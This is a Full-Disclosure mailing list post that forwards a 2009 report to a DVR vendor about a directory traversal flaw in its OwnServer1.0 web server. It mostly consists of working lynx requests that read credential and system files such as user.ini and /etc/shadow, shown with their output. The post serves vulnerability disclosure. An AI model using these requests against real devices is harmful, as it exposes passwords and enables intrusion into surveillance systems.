I tried to report this to the vendor in 2009. SHODAN "OwnServer1.0": Results 1 - 10 of about 11832 for OwnServer1.0 country:US. -Jason Ellison ---------- Forwarded message ---------- From: Jason Ellison <infotek@gmail.com> Date: Fri, Apr 10, 2009 at 5:02 PM Subject: DVR Security Issue To: sales@tibetsystem.com Hello, I am a I.T. consultant in the U.S. I have discovered a security flaw in your product. Please forward to the appropriate person in your company (software engineer maybe?). Tibetsystem DVR security issue: Your Windows and Linux based DVR use the same webserver, "OwnServer1.0"... This web server has a directory traversal vulnerability that was discovered in 2004. This can be used to get the usernames and passwords of the DVR (or any local file). The usernames and passwords are Hex encoded ASCII. In addition to this the webapp delivers the complete server config including ALL valid usernames and passwords if you give proper authentication. So if I login using default anonymous:blank, all accounts and passwords are delivered in clear text. Is there an update for this issue? $ lynx -source http://a.b.c.d/../../../../../../../home/dvr/sdvr/kdvr/user.ini [@Sdvr] validate=1 [user_time] admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 [users] admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF130000FFFF00000000000000000000000000000000000019 anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A0000FFFFFF $ lynx -source http://a.b.c.d/../../windows/dvr2.ini [generic] encoder=0 dual_streaming=1 [dfs3] current_path=E:\dfs recycle=1 retain=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 record_path=F:\dfs;E:\dfs; [Viewer] run=C:\dvr\remote.exe,5.5.0.0 setup=C:\dvr\client\clientinstall.exe,5.5.0.0 [user_time] admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 [user32] admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF930000FFFF00000000000000000000000000000000000099 anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0000FFFFFFFF130000001300000013000000130000003B lynx -source http://10.10.10.56/../../../../../../../etc/shadow root:$1$q0HFBbpi$removed:13328:0:99999:7::: bin:*:13328:0:99999:7::: daemon:*:13328:0:99999:7::: adm:*:13328:0:99999:7::: lp:*:13328:0:99999:7::: sync:*:13328:0:99999:7::: shutdown:*:13328:0:99999:7::: halt:*:13328:0:99999:7::: mail:*:13328:0:99999:7::: news:*:13328:0:99999:7::: uucp:*:13328:0:99999:7::: operator:*:13328:0:99999:7::: games:*:13328:0:99999:7::: nobody:*:13328:0:99999:7::: rpm:!!:13328:::::: messagebus:!!:13328:::::: haldaemon:!!:13328:::::: vcsa:!!:13328:::::: xfs:!!:13328:::::: rpc:!!:13328:::::: rpcuser:!!:13328:::::: clamav:!!:13328:::::: sshd:!!:13328:::::: quess:$1$tpvrlLSt$removed:13328:0:99999:7::: $ lynx -source http://a.b.c.d/../../boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-01/0184.html OwnServer 1.0 Directory Transversal Vulnerability _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/